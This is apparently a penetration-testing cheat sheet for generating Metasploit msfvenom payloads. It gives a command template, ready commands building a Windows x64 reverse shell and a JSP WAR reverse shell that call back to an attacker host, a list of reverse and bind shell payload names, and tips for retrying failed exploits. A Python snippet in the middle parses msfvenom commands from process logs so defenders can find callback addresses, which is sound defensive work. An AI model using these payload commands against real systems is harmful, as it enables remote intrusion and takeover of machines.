Metasploit msfvenom Payloads


The payloads below are commonly used and are available from within Metasploit. They can also be generated outside of Metasploit by running msfvenom from the command line as follows:

msfvenom -p [payload name] -a [x64 or x86] --platform [windows/linux] -e [encoder] -f [optional output format] -o [optional output file name] EXITFUNC=thread LHOST=[listening/attacker host] LPORT=[listening port]


For example, generating a basic shellcode payload for a Windows x64 system would look something like this:

msfvenom -p windows/x64/shell_reverse_tcp -a x64 --platform windows -e x64/xor -f raw -o meterpreterx64.bin EXITFUNC=thread LHOST=10.10.10.10 LPORT=4444
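From the defender's side, the same command layout can be parsed back out of process-audit logs to recover the payload name and callback address for hunting. This is an added example, not part of the original page; the log line layout (host=, user=, cmd="...") and the sample lines are constructed assumptions.

```python
import os
import re
import shlex

# Constructed sample process-audit lines (not real logs); the field layout is assumed.
SAMPLE_LOG = [
    'host=build01 user=dev cmd="msfvenom -p windows/x64/shell_reverse_tcp -a x64 --platform windows -e x64/xor -f raw -o out.bin EXITFUNC=thread LHOST=10.10.10.10 LPORT=4444"',
    'host=build01 user=dev cmd="ls -la /tmp"',
    'host=web02 user=www-data cmd="/opt/metasploit-framework/bin/msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war"',
    'host=web02 user=ops cmd="msfvenom --payload windows/meterpreter/reverse_https LHOST=192.0.2.7 LPORT=8443 -f exe"',
]

CMD_RE = re.compile(r'host=(\S+) user=(\S+) cmd="(.*)"$')
# msfvenom options worth keeping for triage (short and long forms).
FLAGS = {"-p": "payload", "--payload": "payload", "-f": "format", "--format": "format",
         "-o": "out", "--out": "out", "-e": "encoder", "--encoder": "encoder"}

def parse_msfvenom(line):
    """Return a dict describing an msfvenom invocation, or None for any other command."""
    m = CMD_RE.search(line)
    if not m:
        return None
    host, user, cmd = m.groups()
    argv = shlex.split(cmd)
    # Match on the basename so a full install path is still recognised.
    if not argv or os.path.basename(argv[0]) != "msfvenom":
        return None
    hit = {"host": host, "user": user}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in FLAGS and i + 1 < len(argv):
            hit[FLAGS[tok]] = argv[i + 1]
            i += 1                      # skip the flag's value
        elif re.fullmatch(r"[A-Z][A-Za-z0-9_]*=.+", tok):
            key, value = tok.split("=", 1)   # KEY=VALUE options such as LHOST, LPORT
            hit[key] = value
        i += 1
    hit["meterpreter"] = "meterpreter" in hit.get("payload", "")
    return hit

def callback_endpoints(lines):
    """Unique (LHOST, LPORT) pairs to pivot on in firewall, proxy or flow logs."""
    hits = [h for h in map(parse_msfvenom, lines) if h]
    return sorted({(h["LHOST"], int(h["LPORT"])) for h in hits
                   if h.get("LHOST") and h.get("LPORT", "").isdigit()})

if __name__ == "__main__":
    print(callback_endpoints(SAMPLE_LOG))
```
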


If your exploit fails while using any one of the meterpreter payloads, retry the exploit using a non-meterpreter payload such as ‘windows/shell/reverse_tcp’.

Too many times I assumed an exploit was not working only to find that the host I was trying to exploit just didn’t like my meterpreter payload…


Platform / Payload Name

Linux
  • payload/linux/x86/meterpreter_reverse_tcp
  • payload/linux/x86/shell/reverse_tcp

Windows
  • windows/meterpreter/reverse_https
  • windows/shell/reverse_tcp
  • windows/x64/shell_reverse_tcp

Generic
  • generic/shell_reverse_tcp

PHP
  • php/reverse_php
  • php/meterpreter_reverse_tcp
  • php/meterpreter/reverse_tcp
  • php/bind_php
  • php/exec

Java
  • java/jsp_shell_reverse_tcp

            -Java War Shell-

            msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war > iwonthe.war

            File can be uploaded wherever WAR files are accepted

 

 

 

 

   
